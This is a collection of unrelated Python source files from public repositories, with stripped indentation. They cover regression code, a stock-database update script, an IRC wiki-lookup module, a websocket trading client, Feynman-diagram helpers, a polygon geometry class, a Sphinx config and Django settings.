# get optimal lambda, sseTest, sseTraining, theta - sort on sseTest
findings = sorted(findings, key=lambda linkObj: linkObj.sseTest)
print('Findings length = ', findings.__len__())
print('Error in ridge reg: ', findings[0].sseTest)
print('Error in ridge reg last: ', findings[-1].sseTest)
return findings[0].theta, findings
def main():
lambdaList = [0.01]
kList = [2,3]
x = np.arange(24).reshape(6, 4)
#x = np.mat(x)
#x = np.squeeze(np.asarray(x))
y = [1, 2, 3, 4, 5, 6]
#y = np.mat(y)
y = array(y)
print(np.shape(x))
print(np.shape(y))
print(type(x))
print(type(y))
# ridgeRegression(xTraining, yTraining, xTest, yTest, lambdaList, kList, nList = 0)
print('theta: \n', ridgeRegression(x,y.transpose(),lambdaList,kList))
return
def linearReg(xTraining, yTraining, xTest, yTest, nList = 0):
print('Linear Regression\n')
X = xTraining
print('With closed form:')
theta = calculateThetaClosedForm(X, yTraining)
print('Theta: ', theta)
sseTraining = calculateError(X, theta, yTraining)
print('Error for training: ', sseTraining)
#sseTest = calculateError(phiXTest, theta, yTest)
sseTest = calculateError(xTest, theta, yTest)
print('Error for testing: ', sseTest)
print('\n')
'''
print('With gradient descent:')
theta = calculateThetaGradientDescent(X, yTraining, n)
print('Theta: ', theta)
sseTraining = calculateError(X, theta, yTraining)
print('Error for training: ', sseTraining)
sseTest = calculateError(phiXTest, theta, yTest)
print('Error for testing: ', sseTest)
print('\n')
'''
return theta
# main()
'''
def main():
# Linear regression
# load data
dataSet = sio.loadmat('./dataset1.mat', squeeze_me=True)
xTraining = dataSet['X_trn']
yTraining = dataSet['Y_trn']
xTest = dataSet['X_tst']
yTest = dataSet['Y_tst']
n = [2, 3]
linearReg(xTraining, yTraining, xTest, yTest, n)
# Ridge regression
dataSet = sio.loadmat('./dataset2.mat', squeeze_me=True)
xTraining = dataSet['X_trn']
yTraining = dataSet['Y_trn']
xTest = dataSet['X_tst']
yTest = dataSet['Y_tst']
lambdaList = [0.01, 0.02, 0.05, 0.1, 0.25, 0.5, 1]
kList = [2, 10, yTraining.__len__()]
nList = [2, 5]
ridgeRegression(xTraining, yTraining, xTest, yTest, lambdaList, kList, nList)
return
'''
#main()
85ab2941878d47522bed6e8ecb023b9ccf8a7bfd | 31059d647e1294b7da3947cd03d2704019423698 | /alter_elist_add_fxfs.py | 0fa1dc5ff5a2d4178a84f12a75308696bd50c99f | [] | no_license | ZQ-Qi/stock_analysis | aadd1beec9505a30e61be3ffc9ba1e552b28a7e5 | 063a39af182e9f6c98211a40a967f374472fafd5 | refs/heads/master | 2022-02-28T22:46:44.547653 | 2019-10-01T08:07:21 | 2019-10-01T08:07:21 | 198,556,798 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,050 | py | """
Add an fxfs (issuance method) column to event_list.
"""
import db_pool
def get_fxfs_from_zfss(db_p, gpdm, dt):
conn = db_p.connection()
cur = conn.cursor()
sql = "select fxfs from zfss where gpdm = '{}' and ssggr = '{}';".format(gpdm, dt)
cur.execute(sql)
result = []
for item in cur.fetchall():
result.append(item[0])
cur.close()
conn.close()
if len(result) == 1:
return result[0]
    elif len(result) > 1:  # more than one issuance method found; check whether they agree
flag = True
for i in range(1, len(result)):
if result[0] != result[i]:
flag = False
        if flag:  # all issuances on this date share one method: return it
            return result[0]
        else:  # the issuance methods differ
            print("{} has multiple issuance methods for its offering on {}: {}".format(gpdm, dt, result))
sorted_result = []
for i in result:
if i not in sorted_result:
sorted_result.append(i)
return ",".join(sorted_result)
    else:  # no search result: return 'Error'
return 'Error'
def update_eventlist_add_fxfs(db_p, dataset):
conn = db_p.connection()
cur = conn.cursor()
for list in dataset:
sql = "update event_list set fxfs = '{}' where gpdm = '{}' and dt = '{}'".format(list[2], list[0], list[1])
cur.execute(sql)
conn.commit()
cur.close()
conn.close()
if __name__ == "__main__":
db_p = db_pool.get_db_pool(False)
conn = db_p.connection()
cur = conn.cursor()
sql = "select gpdm, dt from event_list where isipo = 0 and fxfs is null;"
cur.execute(sql)
e_list = []
for item in cur.fetchall():
e_list.append([item[0], item[1]])
# print(e_list)
cur.close()
conn.close()
for i in range(0, len(e_list)):
fxfs = get_fxfs_from_zfss(db_p, e_list[i][0], e_list[i][1])
e_list[i].append(fxfs)
update_eventlist_add_fxfs(db_p, e_list)
# ===== File: /anagram/anagram.py (repo: butterflylady/exercism, no license) =====
def find_anagrams(word, candidates):
output = []
for candidate in candidates:
if sorted(candidate.lower()) == sorted(word.lower()) and candidate.lower() != word.lower():
output.append(candidate)
return output
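# Example:
#   find_anagrams('listen', ['enlists', 'google', 'inlets', 'banana'])
#   -> ['inlets']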
# ===== File: /modules/archwiki.py (repo: Ramblurr/phenny, no license) =====
#!/usr/bin/env python
"""
archwiki.py - Phenny ArchWiki Module
Copyright 2008-9, Sean B. Palmer, inamidst.com
Licensed under the Eiffel Forum License 2.
http://inamidst.com/phenny/
modified from Wikipedia module
author: mutantmonkey <[email protected]>
"""
import re, urllib
import web
import json
wikiapi = 'https://wiki.archlinux.org/api.php?action=query&list=search&srsearch=%s&limit=1&prop=snippet&format=json'
wikiuri = 'https://wiki.archlinux.org/index.php/%s'
wikisearch = 'https://wiki.archlinux.org/index.php/Special:Search?' \
+ 'search=%s&fulltext=Search'
r_tr = re.compile(r'(?ims)<tr[^>]*>.*?</tr>')
r_content = re.compile(r'(?ims)</p>\n</div>.*?<!-- end content -->')
r_paragraph = re.compile(r'(?ims)<p[^>]*>.*?</p>|<li(?!n)[^>]*>.*?</li>')
r_tag = re.compile(r'<(?!!)[^>]+>')
r_whitespace = re.compile(r'[\t\r\n ]+')
r_redirect = re.compile(
r'(?ims)class=.redirectText.>\s*<a\s*href=./wiki/([^"/]+)'
)
abbrs = ['etc', 'ca', 'cf', 'Co', 'Ltd', 'Inc', 'Mt', 'Mr', 'Mrs',
'Dr', 'Ms', 'Rev', 'Fr', 'St', 'Sgt', 'pron', 'approx', 'lit',
'syn', 'transl', 'sess', 'fl', 'Op'] \
+ list('ABCDEFGHIJKLMNOPQRSTUVWXYZ') \
+ list('abcdefghijklmnopqrstuvwxyz')
t_sentence = r'^.{5,}?(?<!\b%s)(?:\.(?=[\[ ][A-Z0-9]|\Z)|\Z)'
r_sentence = re.compile(t_sentence % r')(?<!\b'.join(abbrs))
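# t_sentence interpolates every abbreviation into a negative lookbehind, so a
# period after e.g. "Dr" or a lone capital letter does not terminate the match.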
def unescape(s):
    s = s.replace('&gt;', '>')
    s = s.replace('&lt;', '<')
    s = s.replace('&amp;', '&')
    s = s.replace('&#160;', ' ')
return s
def text(html):
html = r_tag.sub('', html)
html = r_whitespace.sub(' ', html)
return unescape(html).strip()
def archwiki(term, last=False):
global wikiapi, wikiuri
url = wikiapi % term
bytes = web.get(url)
result = json.loads(bytes)
result = result['query']['search']
if len(result) <= 0:
return None
term = result[0]['title']
term = term.replace(' ', '_')
snippet = text(result[0]['snippet'])
return "%s - %s" % (snippet, wikiuri % term)
def awik(phenny, input):
origterm = input.groups()[1]
if not origterm:
return phenny.say('Perhaps you meant ".awik dwm"?')
origterm = origterm.encode('utf-8')
term = urllib.unquote(origterm)
term = term[0].upper() + term[1:]
term = term.replace(' ', '_')
try: result = archwiki(term)
except IOError:
error = "Can't connect to wiki.archlinux.org (%s)" % (wikiuri % term)
return phenny.say(error)
if result is not None:
phenny.say(result)
else: phenny.say('Can\'t find anything in the ArchWiki for "%s".' % origterm)
awik.commands = ['awik']
awik.priority = 'high'
if __name__ == '__main__':
print __doc__.strip()
# ===== File: /AxiSEM3D/python_scripts/wisdom_kernel.py (repo: AlexSzen/private_Axisem3D, license: MIT) =====
'''
Given a kernel stored as a Fourier expansion, examine the decay of its
Fourier coefficients to produce a smaller expansion that is still
sufficient to model the kernel.

Objective: learn the maximal necessary expansion order for kernels.
'''
import numpy as np
class wisdom:
def __init__(self, kernel, nuKer, epsilon):
self.kernel = np.squeeze(kernel)
self.nuKer = nuKer
self.nelem = len(nuKer)
self.nu_sum = np.cumsum(np.concatenate(([0],nuKer)))[:-1]
self.epsilon = epsilon
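    # self.nu_sum[i] holds the running offset of element i's Fourier
    # coefficients in the flattened kernel array (an exclusive prefix sum
    # of nuKer).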
def learn_wisdom(self,comp):
wisdom_nu = []
totalMax = np.max(np.abs(self.kernel[:, comp, :, :] + 1j * self.kernel[:, comp+1, :, :]))
for ielem in range(self.nelem):
nuElem = self.nuKer[ielem]
nuOffset = self.nu_sum[ielem]
wisdom_nu_elem = []
for ipol in range(5):
for jpol in range(5):
absKerPoint = np.abs(self.kernel[nuOffset:nuOffset+nuElem, comp, ipol, jpol] + 1j * self.kernel[nuOffset:nuOffset+nuElem, comp+1, ipol, jpol])
maxKer = np.amax(absKerPoint)
indMaxKer = np.argmax(absKerPoint)
if maxKer < 1e-7 * totalMax:
wisdom_nu_elem.append(0)
continue
for inu in range(indMaxKer, nuElem):
if absKerPoint[inu] < self.epsilon * maxKer:
wisdom_nu_elem.append(inu)
break
if wisdom_nu_elem == []:
max_wisdom_nu_elem = nuElem
else :
max_wisdom_nu_elem = np.max(wisdom_nu_elem)
wisdom_nu.append(max_wisdom_nu_elem)
return wisdom_nu
# ===== File: /python_trade/sample.py (repo: lyonLeeLPL/trade, no license) =====
# coding: UTF-8
import json
import websocket
from time import sleep
from logging import getLogger,INFO,StreamHandler
logger = getLogger(__name__)
handler = StreamHandler()
handler.setLevel(INFO)
logger.setLevel(INFO)
logger.addHandler(handler)
"""
This program calls Bitflyer real time API JSON-RPC2.0 over Websocket
"""
class RealtimeAPI(object):
def __init__(self, url, channel):
self.url = url
self.channel = channel
#Define Websocket
self.ws = websocket.WebSocketApp(self.url,header=None,on_open=self.on_open, on_message=self.on_message, on_error=self.on_error, on_close=self.on_close)
websocket.enableTrace(True)
def run(self):
        # ws.run_forever() blocks in its own loop; press Ctrl+C to raise KeyboardInterrupt and stop it.
self.ws.run_forever()
logger.info('Web Socket process ended.')
"""
Below are callback functions of websocket.
"""
# when we get message
def on_message(self, ws, message):
output = json.loads(message)['params']
logger.info(output)
# when error occurs
def on_error(self, ws, error):
logger.error(error)
# when websocket closed.
def on_close(self, ws):
logger.info('disconnected streaming server')
# when websocket opened.
def on_open(self, ws):
logger.info('connected streaming server')
output_json = json.dumps(
{'method' : 'subscribe',
'params' : {'channel' : self.channel}
}
)
ws.send(output_json)
if __name__ == '__main__':
#API endpoint
url = 'wss://ws.lightstream.bitflyer.com/json-rpc'
channel = 'lightning_board_snapshot_BTC_JPY'
json_rpc = RealtimeAPI(url=url, channel=channel)
    # exit with Ctrl+C
json_rpc.run()
# ===== File: /ubonn-thesis/pyfeyn/myPyFeyn/draw_stuff.py (repo: maxxrichard/master_thesis, no license) =====
from pyfeyn.lines import Fermion
from pyfeyn.lines import Photon
from pyfeyn.lines import Gluon
from pyfeyn.lines import Higgs
from pyfeyn.points import Point, Vertex
from pyfeyn.deco import Label
nfermion = -1
nboson = -1
ngluon = -1
nhiggs = -1
fermions = []
bosons = []
gluons = []
higgs = []
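# Minimal usage sketch (assumes pyfeyn's FeynDiagram collects drawn objects;
# points, styles and the output name are illustrative):
#   from pyfeyn.diagrams import FeynDiagram
#   fd = FeynDiagram()
#   draw_fermion(Point(-2, 0), Point(2, 0), [], r"$e^-$")
#   fd.draw("diagram.pdf")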
def draw_fermion(pnt1, pnt2, COLOR, label,
displacement=-0.25, position=0.5, thickness=0, bend=0):
global nfermion, fermions
nfermion += 1
fermions.append(Fermion(pnt1, pnt2).addArrow())
if label != '':
if displacement == 0.0 and position == 0.0:
#print('Not moving fermion label')
fermions[nfermion].addLabel(label)
else:
#print('Moving fermion label by', displacement)
fermions[nfermion].addLabel(
label, displace=displacement, pos=position)
fermions[nfermion].setStyles(COLOR)
if thickness != 0:
#print('Changing thickness to', thickness)
fermions[nfermion].addStyle(thickness)
if bend != 0:
#print('Changing bend to', bend)
fermions[nfermion].bend(bend)
def draw_boson(pnt1, pnt2, COLOR, label,
displacement=-0.25, position=0.5, thickness=0, bend=0):
global nboson, bosons
nboson += 1
bosons.append(Photon(pnt1, pnt2))
if label != '':
if displacement == 0.0 and position == 0.0:
#print('Not moving boson label')
bosons[nboson].addLabel(label)
else:
#print('Moving boson label by', displacement)
bosons[nboson].addLabel(label, displace=displacement, pos=position)
bosons[nboson].setStyles(COLOR)
if thickness != 0:
#print('Changing thickness to', thickness)
bosons[nboson].addStyle(thickness)
if bend != 0:
#print('Changing bend to', bend)
bosons[nboson].bend(bend)
def draw_gluon(pnt1, pnt2, COLOR, label,
displacement=-0.25, position=0.5, thickness=0, bend=0):
global ngluon, gluons
ngluon += 1
gluons.append(Gluon(pnt1, pnt2))
if label != '':
if displacement == 0.0 and position == 0.0:
#print('Not moving gluon label')
gluons[ngluon].addLabel(label)
else:
#print('Moving gluon label by', displacement)
gluons[ngluon].addLabel(label, displace=displacement, pos=position)
gluons[ngluon].setStyles(COLOR)
if thickness != 0:
#print('Changing thickness to', thickness)
gluons[ngluon].addStyle(thickness)
if bend != 0:
#print('Changing bend to', bend)
gluons[ngluon].bend(bend)
def draw_higgs(pnt1, pnt2, COLOR, label,
displacement=-0.25, position=0.5, thickness=0, bend=0):
global nhiggs, higgs
nhiggs += 1
higgs.append(Higgs(pnt1, pnt2))
if label != '':
if displacement == 0.0 and position == 0.0:
#print('Not moving Higgs label')
higgs[nhiggs].addLabel(label)
else:
#print('Moving Higgs label by', displacement)
higgs[nhiggs].addLabel(label, displace=displacement, pos=position)
higgs[nhiggs].setStyles(COLOR)
if thickness != 0:
#print('Changing thickness to', thickness)
higgs[nhiggs].addStyle(thickness)
if bend != 0:
#print('Changing bend to', bend)
higgs[nhiggs].bend(bend)
# ===== File: /list.py (repo: SalwanSaad/Calculator, no license) =====
import math
def options():
try:
process = input("Mathematical process: ")
if len(process) > 1:
num1 = int(input("First number: "))
else:
num1 = int(input("First number: "))
num2 = int(input("Second number: "))
process2= process.upper()
if process == '-':
totall = num1 - num2
print(f'{num1} - {num2} = {totall}')
elif process == '+':
totall = num1 + num2
print(f'{num1} + {num2} = {totall}')
elif process == '/':
totall = num1 / num2
print(f'{num1} / {num2} = {totall}')
elif process == '*':
totall = num1 * num2
print(f'{num1} * {num2} = {totall}')
elif process == '%':
totall = num1 % num2
print(f'{num1} % {num2} = {totall}')
elif process2 == 'COS':
totall = math.cos(num1)
print(f'Cos({num1}) = {totall}')
elif process2 == 'SIN':
totall = math.sin(num1)
print(f'Sin({num1}) = {totall}')
elif process2 == 'TAN':
totall = math.tan(num1)
print(f'Tan({num1}) = {totall}')
else:
print('Please use the following (cos , sin , tan , + , - , * , /)')
except ZeroDivisionError:
print('You can not divide the number by zero')
except ValueError:
print('Please enter a number')
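# Note: this module only defines options(); nothing calls it. A minimal entry
# point would be:
#   if __name__ == '__main__':
#       options()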
# ===== File: /poly.py (repo: glotyuids/PolyGame, no license) =====
# -*- coding: utf-8 -*-
import copy
from math import sin,cos,tan,pi
LOG = 0
MOVE = (255,0,0)
WALL = (0,0,0)
FINISH = (0,255,0)
class Polygon():
def __init__(self,lst,tp = WALL):
self.pts = []
import pprint
print 'in Polygon!'
pprint.pprint(lst)
if self.is_poly(lst):
self.pts = lst[:]
self.move = 0
self.type = tp
def parallel_axes(self,lst):
if lst[0]!=lst[-1]:lst.append(lst[0])
for i in xrange(len(lst)-1):
if not((lst[i][0]==lst[i+1][0]) or (lst[i][1]==lst[i+1][1])):
return False
return True
def can_move(self,i=None):
if i == None:
return self.move
if i:
self.move = 1
else:
self.move = 0
def is_poly(self,a):
if not (isinstance(a,list)):
print 'a',a
raise Exception('Coordinates must be in list')
return False
if not(len(a)==4):
raise Exception('Only 4 coordinates in list')
return False
return True
def gradus2rad(self,a):
return a*pi/180
def rad2gradus(self,a):
return a*180/pi
def rotate_point(self,xy1,a=None,only_x = 0,only_y = 0):
"""
a - radian! NOT tan(alpha)
"""
xy = xy1[:]
if a == None:
return xy[:]
x = xy[0]
y = xy[1]
cosa = round(cos(a),4)
sina = round(sin(a),4)
new_x = x*cosa + y*sina
new_y = -1*x*sina+y*cosa
if only_x : return new_x
if only_y : return new_y
return [new_x,new_y]
def intersec_with_arc(self,xy,r,angle_start,angle_finish,delta_angle,every = 2):
def get_xy(x,y,rq,angle):
uy = round(y + cos(angle)*rq,3)
ux = round(x + sin(angle)*rq,3)
return [uy,ux]
x0,y0 = xy[0],xy[1]
min_angle = min([angle_start,angle_finish])
max_angle = max([angle_start,angle_finish])
angles = [x+min_angle for x in xrange(int(delta_angle)+1) if x%every]
coords = [get_xy(x0,y0,r,self.gradus2rad(i)) for i in angles]
for x in xrange(len(coords)-1):
if self.cross_with_line(coords[x],coords[x+1]):
return True
return False
def rotate(self,angle=None,nullpoint = None,new = True):
# angle - gradus
def sgn(a):
if a<0:
return -1
return 1
def normalize(a):
if not(-90<=a<=90):
angle = (abs(a)-90)*sgn(a)
normalize(a)
return True
def to_zero(g=None,np = None):
a = g[:]
if np == None:
f = a[0]
else:
f = np[:]
for i in xrange(len(a)):
if LOG: print 'i :',i,' a[i]: ',a[i],' a: ',a,' f: ',f
a[i][0] -= f[0]
a[i][1] -= f[1]
del g,np
return a[:],f
def from_zero(a=None,f=None):
b = a[:]
h = f[:]
for i in xrange(len(a)):
b[i][0] += h[0]
b[i][1] += h[1]
return b[:]
if angle < 0: angle+=360
a1 = self.pts[:]
g,h = to_zero(a1[:], np = nullpoint)
for i in xrange(len(g)):
g[i] = self.rotate_point(g[i],self.gradus2rad(angle))
j = from_zero(g[:],h[:])
if new:
pgn = copy.deepcopy(Polygon(j[:]))
pgn.move = self.move
pgn.type = self.type
return copy.deepcopy(pgn)
else:
self.pts = j[:]
def rewrite_pts(self,a):
if not (self.is_poly(a)):
return False
self.pts = a[:]
return True
def contain(self,item):
if len(item)!=2:
return False
x = item[0]
y = item[1]
minx = min([x for x,y in self.pts])
miny = min([y for x,y in self.pts])
maxx = max([x for x,y in self.pts])
maxy = max([y for x,y in self.pts])
if (minx<=x<=maxx) and (miny<=y<=maxy):
return True
return False
def find_A(self,XY1,XY2):
return XY2[1]-XY1[1]
def find_B(self,XY1,XY2):
return -XY2[0]+XY1[0]
def find_C(self,XY1,XY2):
return -XY1[0]*XY2[1]+XY2[0]*XY1[1]
def get_parameters(self,XY1,XY2):
return [self.find_A(XY1,XY2),self.find_B(XY1,XY2),self.find_C(XY1,XY2)]
def cross(self,a,AP):
a1 = a[:]
if a1[0]!=a1[-1]:a1.append(a1[0])
for i in xrange(len(a1)-1):
if self.cross_with_line(a1[i],a1[i+1],AP):
return True
return False
def near_point(self,XY,A1,d=0.1):
return ((XY[0]-A1[0])**2+(XY[1]-A1[1])**2)**(1.0/2) <= d
def near(self,a,b,c,d,dt=0.1):
if self.near_point(a,c,dt) or\
self.near_point(a,d,dt) or\
self.near_point(b,c,dt) or\
self.near_point(b,d,dt) :
return True
return False
def cross_with_line(self,xy,xy1,AP=None):
a1 = self.pts[:]
if a1[0]!=a1[-1]:a1.append(a1[0])
d = 0.1
f = True
for i in xrange(len(a1)-1):
nr = False
if not(xy == AP) or not(xy1 == AP):
if AP == None:
f = True
else:
f = not(self.near(a1[i],a1[i+1],xy,xy1,d))
nr = True
if self.cross_line(a1[i],a1[i+1],xy,xy1,nearp = nr) and f:
return True
return False
def cross_line(self,A1,A2,B1,B2,d = 1.1,nearp = False):
if self.line_on_line_cross(A1,A2,B1,B2):return False
if self.line_on_line(A1,A2,B1,B2): return False
if self.parallel_lines(A1,A2,B1,B2): return False
a = self.cross_point(A1,A2,B1,B2)
if nearp :
if self.near(A1,A2,a,a,0.1):
return False
else:
d = 1.001
return self.between(A1,A2,a,d) and self.between(B1,B2,a,d)
def cross_point(self,aXY1,aXY2,bXY1,bXY2):
"""
Ax + By + C = 0
"""
A1 = self.find_A(aXY1,aXY2)
A2 = self.find_A(bXY1,bXY2)
B1 = self.find_B(aXY1,aXY2)
B2 = self.find_B(bXY1,bXY2)
C1 = self.find_C(aXY1,aXY2)
C2 = self.find_C(bXY1,bXY2)
if (A1==A2==0) or (B1==B2==0):
return None
return [(B1*C2-B2*C1)/float(A1*B2-A2*B1),(C1*A2-C2*A1)/float(A1*B2-A2*B1)]
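    # cross_point solves the two lines A*x + B*y + C = 0 by Cramer's rule;
    # the shared denominator A1*B2 - A2*B1 vanishes exactly when the lines
    # are parallel (callers filter that case via parallel_lines()).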
def cross_point_param(self,lt1,lt2):
A1,B1,C1 = lt1[0],lt1[1],lt1[2]
A2,B2,C2 = lt2[0],lt2[1],lt2[2]
if A1*B2-A2*B1 == 0:
return None
return [(B1*C2-B2*C1)/float(A1*B2-A2*B1),(C1*A2-C2*A1)/float(A1*B2-A2*B1)]
def between(self,A1,A2,XY,d = 2):
return (((XY[0]-A1[0])**2+(XY[1]-A1[1])**2)**(1.0/2) + ((A2[0]-XY[0])**2+(A2[1]-XY[1])**2)**(1.0/2)) / float(((A2[0]-A1[0])**2+(A2[1]-A1[1])**2)**(1.0/2)) <= d
def on_line(self,A1,A2,XY,d = 0.01):
return (d >= (XY[1] - A1[1]) * (A2[0] - A1[0]) - (XY[0] - A1[0]) * (A2[1] - A1[1]))
def line_on_line(self,A1,A2,B1,B2):
if self.on_line(A1,A2,B1) and self.on_line(A1,A2,B2):
return True
return False
def line_on_line_cross(self,A1,A2,B1,B2):
if self.line_on_line(A1,A2,B1,B2) and (self.between(A1,A2,B1) \
or self.between(A1,A2,B2) or self.between(B1,B2,A1) or self.between(B1,B2,A2)):
return True
return False
def parallel_lines(self,aXY1,aXY2,bXY1,bXY2):
"""
Ax + By + C = 0
"""
A1 = self.find_A(aXY1,aXY2)
A2 = self.find_A(bXY1,bXY2)
B1 = self.find_B(aXY1,aXY2)
B2 = self.find_B(bXY1,bXY2)
C1 = self.find_C(aXY1,aXY2)
C2 = self.find_C(bXY1,bXY2)
# print [A1,B1,C1],[A2,B2,C2]
if A1*B2 == A2*B1:
return True
return False
def __getslice__(self, i, j):
return self.pts[i:j]
def __nonzero__(self):
if len(self.pts)>3:
return True
return False
def __str__(self):
st = "Polygon: "+ str(self.pts)
return st
def __contains__(self,item):
return item in self.pts
def __getitem__(self,num):
        return self.pts[num]
# ===== File: /epam2021sphinx/source/conf.py (repo: sls88/python_epam_2021, no license) =====
# Configuration file for the Sphinx documentation builder.
#
# This file only contains a selection of the most common options. For a full
# list see the documentation:
# https://www.sphinx-doc.org/en/master/usage/configuration.html
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
sys.path.insert(0, os.path.abspath("..//..//hw//hw1"))
sys.path.insert(0, os.path.abspath("..//..//hw//hw2"))
sys.path.insert(0, os.path.abspath("..//..//hw//hw3"))
sys.path.insert(0, os.path.abspath("..//..//hw//hw4"))
sys.path.insert(0, os.path.abspath("..//..//hw//hw5"))
sys.path.insert(0, os.path.abspath("..//..//hw//hw6"))
sys.path.insert(0, os.path.abspath("..//..//hw//hw7"))
sys.path.insert(0, os.path.abspath("..//..//hw//hw8"))
sys.path.insert(0, os.path.abspath("..//..//hw//hw9"))
sys.path.insert(0, os.path.abspath("..//..//hw//hw10"))
sys.path.insert(0, os.path.abspath("..//..//hw//hw11"))
# -- Project information -----------------------------------------------------
project = "Python epam 2021"
copyright = "2021, Dmitry"
author = "Dmitry"
# The full version, including alpha/beta/rc tags
release = "1"
# -- General configuration ---------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = ["sphinx.ext.autodoc", "sphinx.ext.napoleon"]
# Napoleon settings
napoleon_google_docstring = True
napoleon_numpy_docstring = True
napoleon_include_private_with_doc = False
napoleon_include_special_with_doc = True
napoleon_use_admonition_for_examples = False
napoleon_use_admonition_for_notes = False
napoleon_use_admonition_for_references = False
napoleon_use_ivar = False
napoleon_use_param = True
napoleon_use_rtype = True
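# With both napoleon_google_docstring and napoleon_numpy_docstring enabled,
# autodoc accepts Google- and NumPy-style docstrings alike; the use_param and
# use_rtype flags render parameters and return types as structured
# :param:/:rtype: fields in the generated output.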
# Add any paths that contain templates here, relative to this directory.
templates_path = ["_templates"]
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
exclude_patterns = []
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = "nature"
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ["_static"]
| [
"[email protected]"
] | |
0c815faa784cf962acdc946c5bee68a0aada38e0 | a8bf0789f4035d7979439a380b4dd746a0383ed8 | /app/__init__.py | 84a9fa4714fdf3c3d2b6b27dd18b3bb96db237ea | [] | no_license | chaeum/app | 8679d1a8a22cd55ea5f7606a49a2413f8837a308 | 447f2abde7a99ba6f40310f72f788b2dc8e31af3 | refs/heads/master | 2021-01-20T00:21:34.760038 | 2017-04-23T04:38:25 | 2017-04-23T04:38:25 | 89,117,429 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 40 | py | # -*- coding: utf-8 -*-
__all__ = [""]
| [
"[email protected]"
] | |
496b9b1a0ac781eb298c49dd56dddeaa0c0fd2fa | 266fb6ba49327e33ca5b758163a448e8179663dc | /backend/bitter_sound_27405/settings.py | 60170ff259fe2d424ef41917e8ab1bd57166f9ef | [] | no_license | crowdbotics-apps/bitter-sound-27405 | 9be168773f9330011996bd87dee3ae0f773417cb | cba493a67768a176c46e443fe30097657baeaa83 | refs/heads/master | 2023-05-06T02:46:31.203591 | 2021-05-26T00:35:37 | 2021-05-26T00:35:37 | 370,863,369 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,120 | py | """
Django settings for bitter_sound_27405 project.
Generated by 'django-admin startproject' using Django 2.2.2.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
import environ
import logging
env = environ.Env()
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = env.bool("DEBUG", default=False)
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = env.str("SECRET_KEY")
ALLOWED_HOSTS = env.list("HOST", default=["*"])
SITE_ID = 1
SECURE_PROXY_SSL_HEADER = ("HTTP_X_FORWARDED_PROTO", "https")
SECURE_SSL_REDIRECT = env.bool("SECURE_REDIRECT", default=False)
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.sites'
]
LOCAL_APPS = [
'home',
'modules',
'users.apps.UsersConfig',
]
THIRD_PARTY_APPS = [
'rest_framework',
'rest_framework.authtoken',
'rest_auth',
'rest_auth.registration',
'bootstrap4',
'allauth',
'allauth.account',
'allauth.socialaccount',
'allauth.socialaccount.providers.google',
'django_extensions',
'drf_yasg',
'storages',
# start fcm_django push notifications
'fcm_django',
# end fcm_django push notifications
]
INSTALLED_APPS += LOCAL_APPS + THIRD_PARTY_APPS
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'bitter_sound_27405.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'web_build')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'bitter_sound_27405.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
if env.str("DATABASE_URL", default=None):
DATABASES = {
'default': env.db()
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
MIDDLEWARE += ['whitenoise.middleware.WhiteNoiseMiddleware']
AUTHENTICATION_BACKENDS = (
'django.contrib.auth.backends.ModelBackend',
'allauth.account.auth_backends.AuthenticationBackend'
)
STATIC_ROOT = os.path.join(BASE_DIR, "staticfiles")
STATICFILES_DIRS = [os.path.join(BASE_DIR, 'static'), os.path.join(BASE_DIR, 'web_build/static')]
